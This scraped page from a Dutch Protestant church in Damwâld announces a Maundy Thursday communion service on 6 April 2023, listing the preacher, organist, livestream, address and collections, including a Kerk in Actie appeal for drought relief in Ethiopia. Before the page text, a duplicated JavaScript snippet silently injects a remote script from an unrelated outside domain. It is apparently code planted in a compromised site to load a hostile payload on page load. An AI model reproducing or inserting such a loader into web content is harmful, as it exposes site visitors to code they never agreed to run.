;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Witte Donderdag -Viering Heilig Avondmaal - PKN Damwâld
donderdag 6 april 2023
19:30 uur
Vanwege een webbug wordt een verkeerde dag aangegeven. De Avondmaalsdienst is op Witte donderdag 6 april 2023

Witte Donderdag -Viering Heilig Avondmaal

Informatie

Voorganger:Ds. S. Boukes, Balk
Organist:Nienke van der Heide-Visser
Mededeling:Vanwege een webbug wordt een verkeerde dag aangegeven. De Avondmaalsdienst is op Witte donderdag 6 april 2023
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Collecte Kerk in Actie (collectenr. 23031) (vorige collecte van 12 februari)

Collecte Kerk in Actie (collectenr. 23031) (vorige collecte van 12 februari)
Ethiopië - Noodhulp en rampenpreventie
Door klimaatverandering wordt Ethiopië regelmatig getroffen door langdurige droogte en heftige regenval. Vee sterft en oogsten mislukken. Veel mensen raken daardoor afhankelijk van voedselhulp. Met steun van Kerk in Actie leert de kerk boeren en boerinnen vruchtbare grond vasthouden, grond irrigeren en nieuwe gewassen verbouwen die tegen droogte kunnen. Ze gebruiken een weeralarm om te zien wanneer ze kunnen planten en oogsten. Ook helpt de kerk mensen met andere bronnen van inkomsten, zodat ze minder kwetsbaar zijn als de oogst tegenvalt.

Uitganscollecte: Collecte t.b.v. gestegen energiekosten